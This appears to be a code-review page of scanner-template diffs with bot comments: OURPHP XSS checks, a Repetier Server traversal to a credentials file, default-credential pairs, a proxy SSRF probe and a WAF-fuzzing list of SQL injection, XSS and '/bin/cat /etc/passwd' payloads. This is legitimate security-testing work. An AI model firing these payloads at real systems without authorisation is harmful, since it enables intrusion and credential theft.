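Review bot: `classification` is missing `cve-id: CVE-2023-25135`, while the other CVE templates in this commit carry it next to `cvss-metrics`/`cwe-id`; add `cve-id: CVE-2023-25135` below `cvss-score: 9.8` to keep the set consistent. Whether `/ajax/api/user/save` creates an account (`user[email]=pown@pown.net`, `user[username]={{randstr}}`) on a target that rejects the `searchprefs` blob is not visible here; if it does, `description` should say so, as the scan would then leave an artefact behind.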


@ -0,0 +1,39 @@
id: CVE-2023-30210
info:
name: OURPHP <= 7.2.0 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.
reference:
- https://www.ourphp.net/
- https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-tz-php-Reflection-xss/
- https://nvd.nist.gov/vuln/detail/CVE-2023-30210
metadata:
verified: "true"
tags: cve,cve2023,xss,ourphp,unauthenticated
http:
- method: GET
path:
- "{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "barmemCachedPercent"
- "swapPercent"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
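Review bot: The template has no `classification` block at all — `cve-id: CVE-2023-30210` is missing — unlike the sibling CVE-2023-30212 template in this commit, which carries `classification:` with `cve-id`. Adding `classification:` with `cve-id: CVE-2023-30210` and `cwe-id: CWE-79` (the finding is XSS, as the other XSS templates here record) above `metadata` would keep the two consistent. The tag list also includes `unauthenticated`, which the 30212 template omits for the same kind of unauthenticated GET; pick one convention for both.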


@ -0,0 +1,38 @@
id: CVE-2023-30212
info:
name: OURPHP <= 7.2.0 - Cross Site Scripting
author: theamanrawat
severity: medium
description: |
OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
reference:
- https://www.ourphp.net/
- https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/
- https://nvd.nist.gov/vuln/detail/CVE-2023-30212
classification:
cve-id: CVE-2023-30212
metadata:
verified: "true"
tags: cve,cve2023,xss,ourphp
http:
- method: GET
path:
- "{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "location.href='../..</script><script>alert(document.domain)</script>'"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
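Review bot: `vulnerale` in `description` is a typo for `vulnerable`. The `classification` block carries only `cve-id`; adding `cwe-id: CWE-79` would match what the other XSS templates in this commit record. The `tags` also omit `unauthenticated`, which the sibling CVE-2023-30210 template includes for the same kind of GET — align the two.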


@ -2,7 +2,7 @@ id: CVE-2023-31059
info:
name: Repetier Server - Directory Traversal
author: parthmalhotra, pdresearch
author: parthmalhotra,pdresearch
severity: high
description: |
Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
@ -23,7 +23,7 @@ info:
fofa-query: title="Repetier-Server"
tags: cve,cve2023,repetier,lfi
requests:
http:
- method: GET
path:
- "{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"
@ -37,4 +37,4 @@ requests:
- type: status
status:
- 200
- 200


@ -24,9 +24,9 @@ http:
payloads:
username:
- root
- admin
password:
- calvin
- #1Password
attack: pitchfork
matchers-condition: and
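Review bot: `- #1Password` is parsed as an empty sequence entry, not the string `#1Password`: a `#` that follows whitespace starts a YAML comment, so the `password` list becomes `[calvin, null]` and the `pitchfork` attack pairs `admin` with a null password. Quote it: `- "#1Password"`. The page does not show which side of the hunk this line is on; if it is pre-existing the fix still applies.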


@ -0,0 +1,48 @@
id: eclipse-birt-panel
info:
name: Eclipse BIRT Panel - Detect
author: Shiva (Strobes Security)
severity: info
description: Eclipse BIRT (Business Intelligence Reporting Tool) detected
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
reference:
- https://eclipse.github.io/birt-website/
metadata:
max-req: 2
verified: "true"
shodan-query: title:"Eclipse BIRT Home"
google-query: intitle:"Eclipse BIRT Home"
tags: panel,eclipsebirt,detect
http:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/reportviewer/'
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- 'alt="Eclipse Logo'
- 'Eclipse BIRT Home'
condition: or
case-insensitive: true
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Viewer Version : ([0-9.-]+)'
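Review bot: `metadata` uses the key `max-req: 2` while the other templates in this commit use `max-request` (`max-request: 1` in CVE-2023-25135 and platformio-ini, `max-request: 2` in nginx-shards); the jedox-web-panel template added alongside this one has the same `max-req: 2`. Rename both to `max-request: 2` so tooling that reads the field treats these detections like the rest of the set. The `cwe-id: CWE-200` / CVSS 0.0 classification on an info-level panel detection is also unusual next to jedox-web-panel, which carries none — either both detect templates carry it or neither.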


@ -0,0 +1,38 @@
id: jedox-web-panel
info:
name: Jedox Web Login Panel - Detect
author: Team Syslifters / Christoph MAHRL,Aron MOLNAR,Patrick PIRKER,Michael WEDL
severity: info
description: |
Jedox is an Enterprise Performance Management software which is used for planning, analytics and reporting in finance and other areas such as sales, human resources and procurement.
reference:
- https://www.jedox.com
metadata:
max-req: 2
verified: "true"
shodan-query: title:"Jedox Web - Login"
google-query: intitle:"Jedox Web Login"
tags: panel,jedox,detect
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/ui/login/"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Jedox Web - Login"
- "guide-jedox-software"
condition: or
- type: status
status:
- 200


@ -12,7 +12,7 @@ info:
shodan-query: 'http.favicon.hash:-893681401'
tags: panel,login,sophos
requests:
http:
- method: GET
path:
- "{{BaseURL}}"


@ -0,0 +1,33 @@
id: platformio-ini
info:
name: Platformio Config File Disclosure
author: DhiyaneshDK
severity: low
description: “platformio.ini” (Project Configuration File) was detected.
reference:
- https://docs.platformio.org/en/stable/projectconf/index.html
metadata:
max-request: 1
verified: "true"
google-query: inurl:"/platformio.ini"
github-query: '[platformio] language:INI'
tags: config,exposure,platformio
http:
- method: GET
path:
- "{{BaseURL}}/platformio.ini"
matchers-condition: and
matchers:
- type: word
words:
- "[platformio]"
- "platform ="
- "board ="
condition: and
- type: status
status:
- 200
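Review bot: `description` uses typographic quotes (`“platformio.ini”`) where every other template here uses plain ASCII; the curly characters survive into rendered reports and are easy to mangle on copy, so `description: '"platformio.ini" (Project Configuration File) was detected.'` is the cleaner form. Nothing else to change — the three-word `and` match on `[platformio]`, `platform =` and `board =` plus status 200 is a reasonable fingerprint for the file.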


@ -0,0 +1,33 @@
id: nginx-shards
info:
name: NGINX Shards Disclosure
author: DhiyaneshDK
severity: medium
reference:
- https://infosecwriteups.com/how-i-got-rce-in-the-world-largest-russian-company-8e6e8288bc4e
metadata:
max-request: 2
shodan-query: html:"Welcome to Nginx"
tags: exposure,shards,nginx
http:
- method: GET
path:
- "{{BaseURL}}/static/shards.html"
- "{{BaseURL}}/static/shards/html"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "Logs"
- "Database"
- "online shards only"
condition: and
case-insensitive: true
- type: status
status:
- 200
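Review bot: The template has no `description`, unlike every other template in this commit, and `severity: medium` for a disclosure is hard to review without one; a line under `info` such as `description: NGINX shards status page (shards.html) was detected and publicly accessible.` — worded to what the page actually exposes — should be added. The second path, `/static/shards/html`, reads like a typo of `/static/shards.html` rather than a deliberate second location; if it is intentional, a comment above it saying so would stop someone "fixing" it.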


@ -0,0 +1,44 @@
id: ssrf-via-proxy
info:
name: SSRF via Proxy Unsafe
author: geeknik,petergrifin
severity: unknown
reference:
- https://github.com/geeknik/the-nuclei-templates/blob/main/ssrf-by-proxy.yaml
- https://twitter.com/HusseiN98D/status/1649006265450782720
- https://twitter.com/ImoJOnDz/status/1649089777629827072
tags: ssrf,proxy,oast,fuzz
http:
- payloads:
verb:
- GET
- HEAD
- POST
- PUT
- DELETE
- CONNECT
- OPTIONS
- TRACE
- PATCH
raw:
- |+
{{verb}} http://127.0.0.1:22 HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
unsafe: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Protocol mismatch"
- "OpenSSH"
condition: and
- type: status
status:
- 200
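Review bot: `severity: unknown` leaves the finding unrated even though the matcher only fires when the target proxied the request to `127.0.0.1:22` and returned an OpenSSH banner, which is a confirmed SSRF; the other templates in this commit carry a concrete severity. The `CONNECT` entry in the `verb` payload list produces `CONNECT http://127.0.0.1:22 HTTP/1.1`, which is not the request-target form CONNECT uses (it takes `host:port`), so that iteration is malformed and can only add noise — drop it or special-case it. The `|+` block scalar is doing real work here, keeping the trailing newlines of the raw request, presumably so the request is terminated correctly under `unsafe: true`; a comment such as `# |+ keeps the trailing newlines that terminate the raw request` would stop a formatter from "cleaning" it to `|-`.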

794
http/fuzzing/waf-fuzz.yaml Normal file

@ -0,0 +1,794 @@
id: waf-fuzz
info:
name: WAF Fuzzing
author: dwisiswant0,lu4nx,Myst7ic
severity: info
description: A web application firewall was detected.
reference:
- https://github.com/Ekultek/WhatWaf
classification:
cwe-id: CWE-200
tags: waf,tech,fuzz
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_={{whatwaf-payloads}}
- |
GET /?_={{whatwaf-payloads}} HTTP/1.1
Host: {{Hostname}}
payloads:
whatwaf-payloads:
- 484029\") AS xDKy WHERE 5427=5427 UNION ALL SELECT NULL,NULL
- \' AND 1=1 \'
- \'))) AND \'1\'=\'1\' (((\'
- AND 1=1
- \' AND 1=1 \' OR 10=11,<script>alert(\'\');</script>
- \"\"\' AND 1=1 \" OR 1=10 \'\"\"
- \' AND 1=1 OR 2=2
- \' AND 1=1 OR 2=2 \'
- \' )) AND 1=1 \' OR \'2\'=\'3 --\'
- \' AND 1=1 OR 24=25 \'
- \' AND 1=1 OR 9=10 ORDERBY(1,2,3,4,5)
- \' AND 1=1 ORDERBY(1,2,3,4,5) \'; asdf
- AND 1=1,<script>alert(\"1,2,3,4,5);</script>
- AND 1=1,<script>alert(\\"test\\");</script>
- \' AND 1=1;SELECT * FROM information_schema.tables \'
- AS start WHERE 1601=1601 UNION ALL SELECT NULL,NULL
- /bin/cat /etc/passwd
- <img src=x onerror=\\"input\\">
- r\"\"\"&\lt\' AND 1=1 \',<script>alert(\"test\");</script>\"\"\"
- <script>alert(\'1\');</script>
- <script>alert(1);</script>
- <script>alert(\"\");</script>
- <script>alert(\"test\");</script>
- <script>alert(\'test\');</script>
- \'/><script>alert(\'whatwaf\');</script>
- <script>alert(\\"XSS\\");</script>
- SELECT * FROM information_schema.tables
- SELECT user FROM information_schema.tables AND user = \'test user\';
- UNION SELECT * FROM users WHERE user = \'admin\';
stop-at-first-match: true
matchers:
- type: regex
name: instart
regex:
- '(?i)instartrequestid'
part: body
- type: regex
name: perimx
regex:
- '(?i)access.to.this.page.has.been.denied.because.we.believe.you.are.using.automation.tool'
- '(?i)http(s)?://(www.)?perimeterx.\w+.whywasiblocked'
- '(?i)perimeterx'
- '(?i)(..)?client.perimeterx.*/[a-zA-Z]{8,15}/*.*.js'
condition: or
part: response
- type: regex
name: webknight
regex:
- '(?i)\bwebknight'
- '(?i)webknight'
condition: or
part: response
- type: regex
name: zscaler
regex:
- '(?i)zscaler(.\d+(.\d+)?)?'
- '(?i)zscaler'
condition: or
part: response
- type: regex
name: fortigate
regex:
- '(?i).>powered.by.fortinet<.'
- '(?i).>fortigate.ips.sensor<.'
- '(?i)fortigate'
- '(?i).fgd_icon'
- '(?i)\AFORTIWAFSID='
- '(?i)application.blocked.'
- '(?i).fortiGate.application.control'
- '(?i)(http(s)?)?://\w+.fortinet(.\w+:)?'
- '(?i)fortigate.hostname'
- '(?i)the.page.cannot.be.displayed..please.contact.[^@]+@[^@]+\.[^@]+.for.additional.information'
condition: or
part: response
- type: regex
name: teros
regex:
- '(?i)st8(id|.wa|.wf)?.?(\d+|\w+)?'
condition: or
part: response
- type: regex
name: stricthttp
regex:
- '(?i)the.request.was.rejected.because.the.url.contained.a.potentially.malicious.string'
condition: or
part: response
- type: regex
name: stricthttp
regex:
- '(?i)rejected.by.url.scan'
- '(?i)/rejected.by.url.scan'
condition: or
part: response
- type: regex
name: shadowd
regex:
- '(?i)<h\d>\d{3}.forbidden<.h\d>'
- '(?i)request.forbidden.by.administrative.rules.'
condition: or
part: response
- type: regex
name: bigip
regex:
- '(?i)\ATS\w{4,}='
- '(?i)bigipserver(.i)?|bigipserverinternal'
- '(?i)^TS[a-zA-Z0-9]{3,8}='
- '(?i)BigIP|BIG-IP|BIGIP'
- '(?i)bigipserver'
condition: or
part: response
- type: regex
name: edgecast
regex:
- '(?i)\Aecdf'
condition: or
part: response
- type: regex
name: radware
regex:
- '(?i).\bcloudwebsec.radware.com\b.'
- '(?i).>unauthorized.activity.has.been.detected<.'
- '(?i)with.the.following.case.number.in.its.subject:.\d+.'
condition: or
part: response
- type: regex
name: varnish
regex:
- '(?i)varnish'
- '(?i).>.?security.by.cachewall.?<.'
- '(?i)cachewall'
- '(?i).>access.is.blocked.according.to.our.site.security.policy.<+'
condition: or
part: response
- type: regex
name: infosafe
regex:
- '(?i)infosafe'
- '(?i)by.(http(s)?(.//)?)?7i24.(com|net)'
- '(?i)infosafe.\d.\d'
- '(?i)var.infosafekey='
condition: or
part: response
- type: regex
name: aliyundun
regex:
- '(?i)error(s)?.aliyun(dun)?.(com|net)'
- '(?i)http(s)?://(www.)?aliyun.(com|net)'
condition: or
part: response
- type: regex
name: ats
regex:
- '(?i)(\()?apachetrafficserver((\/)?\d+(.\d+(.\d+)?)?)'
- '(?i)ats((\/)?(\d+(.\d+(.\d+)?)?))?'
condition: or
part: response
- type: regex
name: malcare
regex:
- '(?i)malcare'
- '(?i).>login.protection<.+.><.+>powered.by<.+.>(<.+.>)?(.?malcare.-.pro|blogvault)?'
- '(?i).>firewall<.+.><.+>powered.by<.+.>(<.+.>)?(.?malcare.-.pro|blogvault)?'
condition: or
part: response
- type: regex
name: wts
regex:
- '(?i)(<title>)?wts.wa(f)?(\w+(\w+(\w+)?)?)?'
part: response
- type: regex
name: dw
regex:
- '(?i)dw.inj.check'
part: response
- type: regex
name: denyall
regex:
- '(?i)\Acondition.intercepted'
- '(?i)\Asessioncookie='
condition: or
part: response
- type: regex
name: yunsuo
regex:
- '(?i)<img.class=.yunsuologo.'
- '(?i)yunsuo.session'
condition: or
part: response
- type: regex
name: litespeed
regex:
- '(?i)litespeed.web.server'
part: response
- type: regex
name: cloudfront
regex:
- '(?i)[a-zA-Z0-9]{,60}.cloudfront.net'
- '(?i)cloudfront'
- '(?i)x.amz.cf.id|nguardx'
condition: or
part: response
- type: regex
name: anyu
regex:
- '(?i)sorry.{1,2}your.access.has.been.intercept(ed)?.by.anyu'
- '(?i)anyu'
- '(?i)anyu-?.the.green.channel'
condition: or
part: response
- type: regex
name: googlewebservices
regex:
- '(?i)your.client.has.issued.a.malformed.or.illegal.request'
- '(?i)our.systems.have.detected.unusual.traffic'
- '(?i)block(ed)?.by.g.cloud.security.policy.+'
condition: or
part: response
- type: regex
name: didiyun
regex:
- '(?i)(http(s)?://)(sec-waf.|www.)?didi(static|yun)?.com(/static/cloudwafstatic)?'
- '(?i)didiyun'
condition: or
part: response
- type: regex
name: blockdos
regex:
- '(?i)blockdos\.net'
part: response
- type: regex
name: codeigniter
regex:
- '(?i)the.uri.you.submitted.has.disallowed.characters'
part: response
- type: regex
name: stingray
regex:
- '(?i)\AX-Mapping-'
part: response
- type: regex
name: west263
regex:
- '(?i)wt\d*cdn'
part: response
- type: regex
name: aws
regex:
- '(?i)<RequestId>[0-9a-zA-Z]{16,25}<.RequestId>'
- '(?i)<Error><Code>AccessDenied<.Code>'
- '(?i)x.amz.id.\d+'
- '(?i)x.amz.request.id'
condition: or
part: response
- type: regex
name: yundun
regex:
- '(?i)YUNDUN'
- '(?i)^yd.cookie='
- '(?i)http(s)?.//(www\.)?(\w+.)?yundun(.com)?'
- '(?i)<title>.403.forbidden:.access.is.denied.{0,2}<.{0,2}title>'
condition: or
part: response
- type: regex
name: barracuda
regex:
- '(?i)\Abarra.counter.session=?'
- '(?i)(\A|\b)?barracuda.'
- '(?i)barracuda.networks.{1,2}inc'
condition: or
part: response
- type: regex
name: dodenterpriseprotection
regex:
- '(?i)dod.enterprise.level.protection.system'
part: response
- type: regex
name: secupress
regex:
- '(?i)<h\d*>secupress<.'
- '(?i)block.id.{1,2}bad.url.contents.<.'
condition: or
part: response
- type: regex
name: aesecure
regex:
- '(?i)aesecure.denied.png'
part: response
- type: regex
name: incapsula
regex:
- '(?i)incap_ses|visid_incap'
- '(?i)incapsula'
- '(?i)incapsula.incident.id'
condition: or
part: response
- type: regex
name: nexusguard
regex:
- '(?i)nexus.?guard'
- '(?i)((http(s)?://)?speresources.)?nexusguard.com.wafpage'
condition: or
part: response
- type: regex
name: cloudflare
regex:
- '(?i)cloudflare.ray.id.|var.cloudflare.'
- '(?i)cloudflare.nginx'
- '(?i)..cfduid=([a-z0-9]{43})?'
- '(?i)cf[-|_]ray(..)?([0-9a-f]{16})?[-|_]?(dfw|iad)?'
- '(?i).>attention.required!.\|.cloudflare<.+'
- '(?i)http(s)?.//report.(uri.)?cloudflare.com(/cdn.cgi(.beacon/expect.ct)?)?'
- '(?i)ray.id'
- '(?i)__cfduid'
condition: or
part: response
- type: regex
name: akamai
regex:
- '(?i).>access.denied<.'
- '(?i)akamaighost'
- '(?i)ak.bmsc.'
condition: or
part: response
- type: regex
name: webseal
regex:
- '(?i)webseal.error.message.template'
- '(?i)webseal.server.received.an.invalid.http.request'
condition: or
part: response
- type: regex
name: dotdefender
regex:
- '(?i)dotdefender.blocked.your.request'
part: response
- type: regex
name: pk
regex:
- '(?i).>pkSecurityModule\W..\WSecurity.Alert<.'
- '(?i).http(s)?.//([w]{3})?.kitnetwork.\w'
- '(?i).>A.safety.critical.request.was.discovered.and.blocked.<.'
condition: or
part: response
- type: regex
name: expressionengine
regex:
- '(?i).>error.-.expressionengine<.'
- '(?i).>:.the.uri.you.submitted.has.disallowed.characters.<.'
- '(?i)invalid.(get|post).data'
condition: or
part: response
- type: regex
name: comodo
regex:
- '(?i)protected.by.comodo.waf'
part: response
- type: regex
name: ciscoacexml
regex:
- '(?i)ace.xml.gateway'
part: response
- type: regex
name: barikode
regex:
- '(?i).>barikode<.'
- '(?i)<h\d{1}>forbidden.access<.h\d{1}>'
condition: or
part: response
- type: regex
name: watchguard
regex:
- '(?i)(request.denied.by.)?watchguard.firewall'
- '(?i)watchguard(.technologies(.inc)?)?'
condition: or
part: response
- type: regex
name: binarysec
regex:
- '(?i)x.binarysec.via'
- '(?i)x.binarysec.nocache'
- '(?i)binarysec'
condition: or
part: response
- type: regex
name: bekchy
regex:
- '(?i)bekchy.(-.)?access.denied'
- '(?i)(http(s)?://)(www.)?bekchy.com(/report)?'
condition: or
part: response
- type: regex
name: bitninja
regex:
- '(?i)bitninja'
- '(?i)security.check.by.bitninja'
- '(?i).>visitor.anti(\S)?robot.validation<.'
condition: or
part: response
- type: regex
name: apachegeneric
regex:
- '(?i)apache'
- '(?i).>you.don.t.have.permission.to.access+'
- '(?i)was.not.found.on.this.server'
- '(?i)<address>apache/([\d+{1,2}](.[\d+]{1,2}(.[\d+]{1,3})?)?)?'
- '(?i)<title>403 Forbidden</title>'
condition: or
part: response
- type: regex
name: greywizard
regex:
- '(?i)greywizard(.\d.\d(.\d)?)?'
- '(?i)grey.wizard.block'
- '(?i)(http(s)?.//)?(\w+.)?greywizard.com'
- '(?i)grey.wizard'
condition: or
part: response
- type: regex
name: configserver
regex:
- '(?i).>the.firewall.on.this.server.is.blocking.your.connection.<+'
part: response
- type: regex
name: viettel
regex:
- '(?i)<title>access.denied(...)?viettel.waf</title>'
- '(?i)viettel.waf.system'
- '(?i)(http(s).//)?cloudrity.com(.vn)?'
condition: or
part: response
- type: regex
name: safedog
regex:
- '(?i)(http(s)?)?(://)?(www|404|bbs|\w+)?.safedog.\w'
- '(?i)waf(.?\d+.?\d+)'
condition: or
part: response
- type: regex
name: baidu
regex:
- '(?i)yunjiasu.nginx'
part: response
- type: regex
name: alertlogic
regex:
- '(?i).>requested.url.cannot.be.found<.'
- '(?i)proceed.to.homepage'
- '(?i)back.to.previous.page'
- "(?i)we('re|.are)?sorry.{1,2}but.the.page.you.are.looking.for.cannot"
- '(?i)reference.id.?'
- '(?i)page.has.either.been.removed.{1,2}renamed'
condition: or
part: response
- type: regex
name: armor
regex:
- '(?i)blocked.by.website.protection.from.armour'
part: response
- type: regex
name: dosarrest
regex:
- '(?i)dosarrest'
- '(?i)x.dis.request.id'
condition: or
part: response
- type: regex
name: paloalto
regex:
- 'has.been.blocked.in.accordance.with.company.policy'
- '.>Virus.Spyware.Download.Blocked<.'
condition: or
part: response
- type: regex
name: aspgeneric
regex:
- '(?i)this.generic.403.error.means.that.the.authenticated'
- '(?i)request.could.not.be.understood'
- '(?i)<.+>a.potentially.dangerous.request(.querystring)?.+'
- '(?i)runtime.error'
- '(?i).>a.potentially.dangerous.request.path.value.was.detected.from.the.client+'
- '(?i)asp.net.sessionid'
- '(?i)errordocument.to.handle.the.request'
- '(?i)an.application.error.occurred.on.the.server'
- '(?i)error.log.record.number'
- '(?i)error.page.might.contain.sensitive.information'
- "(?i)<.+>server.error.in.'/'.application.+"
- '(?i)\basp.net\b'
condition: or
part: response
- type: regex
name: powerful
regex:
- '(?i)Powerful Firewall'
- '(?i)http(s)?...tiny.cc.powerful.firewall'
condition: or
part: response
- type: regex
name: uewaf
regex:
- '(?i)http(s)?.//ucloud'
- '(?i)uewaf(.deny.pages)'
condition: or
part: response
- type: regex
name: janusec
regex:
- '(?i)janusec'
- '(?i)(http(s)?\W+(www.)?)?janusec.(com|net|org)'
condition: or
part: response
- type: regex
name: siteguard
regex:
- '(?i)>Powered.by.SiteGuard.Lite<'
- '(?i)refuse.to.browse'
condition: or
part: response
- type: regex
name: sonicwall
regex:
- '(?i)This.request.is.blocked.by.the.SonicWALL'
- '(?i)Dell.SonicWALL'
- '(?i)\bDell\b'
- '(?i)Web.Site.Blocked.+\bnsa.banner'
- '(?i)SonicWALL'
- '(?i).>policy.this.site.is.blocked<.'
condition: or
part: response
- type: regex
name: jiasule
regex:
- '(?i)^jsl(_)?tracking'
- '(?i)(__)?jsluid(=)?'
- '(?i)notice.jiasule'
- '(?i)(static|www|dynamic).jiasule.(com|net)'
condition: or
part: response
- type: regex
name: nginxgeneric
regex:
- '(?i)nginx'
- '(?i)you.do(not|n.t)?.have.permission.to.access.this.document'
condition: or
part: response
- type: regex
name: stackpath
regex:
- '(?i)action.that.triggered.the.service.and.blocked'
- '(?i)<h2>sorry,.you.have.been.blocked.?<.h2>'
condition: or
part: response
- type: regex
name: sabre
regex:
- '(?i)dxsupport@sabre.com'
part: response
- type: regex
name: wordfence
regex:
- '(?i)generated.by.wordfence'
- '(?i)your.access.to.this.site.has.been.limited'
- '(?i).>wordfence<.'
condition: or
part: response
- type: regex
name: '360'
regex:
- '(?i).wzws.waf.cgi.'
- '(?i)wangzhan\.360\.cn'
- '(?i)qianxin.waf'
- '(?i)360wzws'
- '(?i)transfer.is.blocked'
condition: or
part: response
- type: regex
name: asm
regex:
- '(?i)the.requested.url.was.rejected..please.consult.with.your.administrator.'
condition: or
part: response
- type: regex
name: rsfirewall
regex:
- '(?i)com.rsfirewall.403.forbidden'
- '(?i)com.rsfirewall.event'
- '(?i)(\b)?rsfirewall(\b)?'
- '(?i)rsfirewall'
condition: or
part: response
- type: regex
name: sucuri
regex:
- '(?i)access.denied.-.sucuri.website.firewall'
- '(?i)sucuri.webSite.firewall.-.cloudProxy.-.access.denied'
- '(?i)questions\?.+cloudproxy@sucuri\.net'
- '(?i)http(s)?.\/\/(cdn|supportx.)?sucuri(.net|com)?'
condition: or
part: response
- type: regex
name: airlock
regex:
- '(?i)\Aal[.-]?(sess|lb)=?'
part: response
- type: regex
name: xuanwudun
regex:
- '(?i)class=.(db)?waf.?(-row.)?>'
part: response
- type: regex
name: chuangyudun
regex:
- '(?i)(http(s)?.//(www.)?)?365cyd.(com|net)'
part: response
- type: regex
name: securesphere
regex:
- '(?i)<h2>error<.h2>'
- '(?i)<title>error<.title>'
- '(?i)<b>error<.b>'
- '(?i)<td.class="(errormessage|error)".height="[0-9]{1,3}".width="[0-9]{1,3}">'
- '(?i)the.incident.id.(is|number.is).'
- '(?i)page.cannot.be.displayed'
- '(?i)contact.support.for.additional.information'
condition: or
part: response
- type: regex
name: anquanbao
regex:
- '(?i).aqb_cc.error.'
part: response
- type: regex
name: modsecurity
regex:
- '(?i)ModSecurity|NYOB'
- '(?i)mod_security'
- '(?i)this.error.was.generated.by.mod.security'
- '(?i)web.server at'
- '(?i)page.you.are.(accessing|trying)?.(to|is)?.(access)?.(is|to)?.(restricted)?'
- '(?i)blocked.by.mod.security'
condition: or
part: response
- type: regex
name: modsecurityowasp
regex:
- '(?i)not.acceptable'
- '(?i)additionally\S.a.406.not.acceptable'
condition: or
part: response
- type: regex
name: squid
regex:
- '(?i)squid'
- '(?i)Access control configuration prevents'
- '(?i)X.Squid.Error'
condition: or
part: response
- type: regex
name: shieldsecurity
regex:
- '(?i)blocked.by.the.shield'
- '(?i)transgression(\(s\))?.against.this'
- '(?i)url.{1,2}form.or.cookie.data.wasn.t.appropriate'
condition: or
part: response
- type: regex
name: wallarm
regex:
- '(?i)nginix.wallarm'
part: response
- type: regex
part: response
name: huaweicloud
condition: and
regex:
- '(?)content="CloudWAF"'
- 'Server: CloudWAF'
- 'Set-Cookie: HWWAFSESID='
# Enhanced by Myst7ic on 2023/04/25


@ -12,7 +12,7 @@ info:
tags: osint,osint-coding,maillist
self-contained: true
requests:
http:
- method: GET
path:
- "https://www.mail-archive.com/search?l=all&q={{user}}"


@ -2,19 +2,21 @@ id: gemfury-takeover
info:
name: Gemfury Takeover Detection
author: pdteam
author: pdteam,daffainfo
severity: high
reference:
- https://github.com/EdOverflow/can-i-take-over-xyz/issues/154
tags: takeover,gemfury
metadata:
max-request: 1
tags: takeover,gemfury
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: dsl
@ -22,5 +24,6 @@ http:
- Host != ip
- type: word
part: header
words:
- "404: This page could not be found."
- "Location: https://gemfury.com/404"


@ -10,15 +10,21 @@ info:
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://github.com/devanshbatham/FavFreak
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
tags: tech,favicon
metadata:
max-request: 1
max-request: 2
tags: tech,favicon
http:
- method: GET
path:
- "{{BaseURL}}/favicon.ico"
- "{{BaseURL}}/{{path}}favicon.ico"
payloads:
path:
- images/
stop-at-first-match: true
host-redirects: true
max-redirects: 2
@ -2657,3 +2663,8 @@ http:
name: "Vue.js"
dsl:
- "status_code==200 && (\"-1252041730\" == mmh3(base64_py(body)))"
- type: dsl
name: "Sophos Email Appliance"
dsl:
- "status_code==200 && (\"-830586692\" == mmh3(base64_py(body)))"


@ -0,0 +1,49 @@
id: wordpress-gdpr-cookie-compliance
info:
name: GDPR Cookie Compliance (CCPA, DSGVO, Cookie Consent) Detection
author: ricardomaia
severity: info
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gdpr-cookie-compliance/readme.txt"
payloads:
last_version: helpers/wordpress/plugins/gdpr-cookie-compliance.txt
extractors:
- type: regex
part: body
internal: true
name: internal_detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
- type: regex
part: body
name: detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
matchers-condition: or
matchers:
- type: dsl
name: "outdated_version"
dsl:
- compare_versions(internal_detected_version, concat("< ", last_version))
- type: regex
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
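Review bot: The `matchers-condition: or` block at the end gives the `outdated_version` DSL matcher and the unnamed readme regex matcher equal weight, so a hit does not tell the reader whether an outdated install or mere presence was found; naming the second matcher, e.g. `name: "detected"` under the final `- type: regex`, keeps the output distinguishable, as the favicon section on this page does with its matcher names. `outdated_version` reads `internal_detected_version`, which is only populated when the internal readme extractor matches, so on the presence-only branch it presumably evaluates against an empty value — a one-line comment above the DSL matcher saying so would save the next maintainer a trip to the docs. The `info` block has no `description:`; a sentence naming the plugin and the version-lag check against `helpers/wordpress/plugins/gdpr-cookie-compliance.txt` would help.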


@ -1,7 +1,7 @@
id: wordpress-sg-security
info:
name: SiteGround Security Detection
name: All-inclusive Security Solution by SiteGround Detection
author: ricardomaia
severity: info
reference:


@ -20,7 +20,7 @@ info:
shodan-query: html:"Apache Druid"
tags: cve,cve2023,apache,druid,kafka,rce,jndi,oast
requests:
http:
- raw:
- |
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1


@ -22,12 +22,16 @@ info:
